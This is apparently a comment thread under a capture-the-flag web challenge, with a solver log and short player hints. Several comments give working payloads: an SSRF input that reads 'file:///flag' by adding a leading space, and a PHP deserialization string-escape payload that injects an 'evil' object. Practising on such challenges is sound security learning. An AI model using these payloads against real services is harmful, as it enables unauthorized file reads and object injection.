评分(7)
解题动态
磊诺 攻破了该题 2天前
wujita01 攻破了该题 3天前
hsk_zy 攻破了该题 5天前
kitniu 攻破了该题 5天前
avaclaire 攻破了该题 7天前
bugfuck2 攻破了该题 10天前
十里故清云 攻破了该题 10天前
liang123456 攻破了该题 10天前
kr2yh 攻破了该题 12天前
FTJJJ 攻破了该题 12天前
lanza2451150 攻破了该题 13天前
hyj11125 攻破了该题 17天前
S-killer 攻破了该题 18天前
Zhengzanmei 攻破了该题 21天前
caixukun520 攻破了该题 22天前
lee8ly 攻破了该题 22天前
SamJij 攻破了该题 22天前
路痴通 攻破了该题 22天前
沧颜 攻破了该题 26天前
评论
Archer7 3年前
举报
index.cgi/?name= file:///flag
lysandria 3年前
举报
挺难的。ssrf的header头可以用空格逃逸。
15338641414 3年前
举报
?name=%20file:///flag
zhougaoleng 4年前
举报
"User-Agent" 那一栏提示curl,终端中使用curl空格然后加协议。可能后台代码判断开头空格识别是否为协议
lengf 4年前
举报
www,太难了,看着wp我都做了好久,序列化和字符串逃逸,ssrf。。。
a2cai 4年前
举报
PHP字符逃逸和SSRF,我不会看WP做的...记到小本本里待学!
hhtctf2 4年前
举报
username=\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0&password=1";O:4:"evil":2:{s:4:"hint";s:8:"hint.php";} 为什么不行啊,页面没变化
hhtctf2 4年前
举报
http://114.67.246.176:11474/ username=\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0&password=1";O:4:"evil":2:{s:4:"hint";s:8:"hint.php&quo
4thrun 4年前
举报
空格逃逸闭合哈哈
BSOD 4年前
举报
这cgi是什么鬼啊